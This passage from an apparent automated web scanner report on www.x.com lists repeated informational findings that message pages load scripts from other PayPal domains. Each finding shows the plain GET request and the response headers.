* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.175. https://www.x.com/message/212124

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.176. https://www.x.com/message/212170

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.177. https://www.x.com/message/212753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.178. https://www.x.com/message/212906

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.179. https://www.x.com/message/213354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.180. https://www.x.com/message/213546

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631303b312c34353633303b312c35333632383b312c35333636373b312c35333631393b312c35333637393b312c35333638373b312c35333731303b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.181. https://www.x.com/message/213568

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.182. https://www.x.com/message/213571

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.183. https://www.x.com/message/213767

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333637393b312c35333638373b312c35333636373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.184. https://www.x.com/message/213787

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.185. https://www.x.com/message/213788

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.186. https://www.x.com/message/213865

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.187. https://www.x.com/message/214347

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.188. https://www.x.com/message/214440

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.189. https://www.x.com/message/214618

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.190. https://www.x.com/message/214902

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.191. https://www.x.com/message/214926

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.192. https://www.x.com/message/215245

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.193. https://www.x.com/message/215254

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
